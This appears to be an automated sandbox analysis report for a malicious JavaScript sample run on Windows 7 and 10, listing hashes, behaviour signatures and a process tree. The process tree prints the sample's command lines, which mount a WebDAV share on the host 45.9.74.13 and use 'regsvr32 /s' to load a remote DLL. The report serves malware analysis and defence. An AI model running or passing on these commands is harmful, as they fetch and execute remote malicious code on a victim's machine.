Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 04:45
Static task
static1
Behavioral task
behavioral1
Sample
11757237022057414128.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
11757237022057414128.js
Resource
win10v2004-20240704-en
General
-
Target
11757237022057414128.js
-
Size
5KB
-
MD5
5f883c8c349f5f9e1c8e266556a824ea
-
SHA1
e01b1513d233bb129de3aecccd75de983ebcee89
-
SHA256
3a1a4f30292ac62adb0ba6fc888d62d2c509bc18ee0d9488cbfaf314177bca48
-
SHA512
5d31a94d7fd91788cf5e776e7f5c7e6bf9fb45d300c60ff1fa507ef2fe6d7a34c9eeda01f315cf9e4de71da10563e43c7e6c5bf5e1c2916f0fc7365b01d908bf
-
SSDEEP
96:zs8vxbHhHTF0Vnpditsd6ZRXKMQTVrukkv:hNHhzi1viid6nXVQTVrpkv
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2672 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2536 wrote to memory of 1396 2536 wscript.exe 31 PID 2536 wrote to memory of 1396 2536 wscript.exe 31 PID 2536 wrote to memory of 1396 2536 wscript.exe 31 PID 1396 wrote to memory of 2632 1396 cmd.exe 33 PID 1396 wrote to memory of 2632 1396 cmd.exe 33 PID 1396 wrote to memory of 2632 1396 cmd.exe 33 PID 1396 wrote to memory of 2672 1396 cmd.exe 34 PID 1396 wrote to memory of 2672 1396 cmd.exe 34 PID 1396 wrote to memory of 2672 1396 cmd.exe 34 PID 1396 wrote to memory of 2672 1396 cmd.exe 34 PID 1396 wrote to memory of 2672 1396 cmd.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\11757237022057414128.js1⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\11757237022057414128.js" "C:\Users\Admin\\xeiypl.bat" && "C:\Users\Admin\\xeiypl.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2632
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\502.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2672
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD55f883c8c349f5f9e1c8e266556a824ea
SHA1e01b1513d233bb129de3aecccd75de983ebcee89
SHA2563a1a4f30292ac62adb0ba6fc888d62d2c509bc18ee0d9488cbfaf314177bca48
SHA5125d31a94d7fd91788cf5e776e7f5c7e6bf9fb45d300c60ff1fa507ef2fe6d7a34c9eeda01f315cf9e4de71da10563e43c7e6c5bf5e1c2916f0fc7365b01d908bf